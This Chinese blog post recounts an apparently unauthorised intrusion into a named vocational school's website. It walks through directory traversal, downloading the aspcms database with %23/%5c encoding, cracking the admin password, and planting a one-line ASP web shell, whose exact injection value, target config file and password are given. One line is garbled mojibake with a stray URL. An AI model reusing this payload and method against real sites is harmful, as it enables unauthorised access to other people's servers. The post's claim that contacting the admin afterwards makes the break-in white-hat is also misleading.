Loading
0

实战渗透莘县职业中等专业学校

注:本文于漏洞修复后发布,仅提供网络安全思路参考


0x00 起因

我一老哥最近也混了网络安全这个圈,学了半吊子的渗透然后跟我这个半吊子把他母校渗透掉,一场腥风血雨由此展开

0x01 踩点

先是系统化踩点扫描,wwwscan扫出来很多站,非常幸运这个站点存在目录遍历漏洞,纰漏了很多信息,给整个渗透过程给予非常大的帮助,

0x02 突破

首先发现网站系统是aspcms的,熟练的进入了/data目录,发现了数据库文件后缀为asp的,因为数据库文件前面加了#,#的十六进制编码对应的是%23,配合%5c暴库,顺利下载到了数据库。(关于暴库这方面,以后会作者会细细讲解)。

之后我把数据库发给了老哥,辅臣MDB查看器,先把asp改成mdb,然后顺利翻出了管理员的账号与密码。

 

0x03 aspcms 后台getshell

拿到md5迅速解密进入后台

┼攠數畣整爠煥敵瑳∨≡┩愾 来自http://www.qxzxp.com/3871.html

因为web环境是IIS,进入后台以后试了一下解析漏洞,坑爹的是自动重命名了,然后看了下吐司,发现了个通杀的后台拿shell方法

1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”

2、在图片处右击,使用浏览器审查元素功能或者firefox的firebug,将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%

3、一句话为密码a。在/config/AspCms_Config.asp

0x04 收尾总结

菜刀连进以后,在老哥的疯狂666下whois了域名, 找到了负责网站运营网管,并联系他修复了漏洞,帮助他简单的维护了下网站,毕竟我可是白帽子,至此文章才发出来供于参考,全程该打码的地方已打码,如果此站还有可被入侵的地方,欢迎各位读者朋友前来技术交流。右上角联系本人QQ即可。感谢阅读~~


文章稿了半年了,最近才发现,目前学校网站已经关闭了,网管说不开了、

本文由A1d4m's blog(www.ychack.com)提供,文章原创版权所有,转载请注明!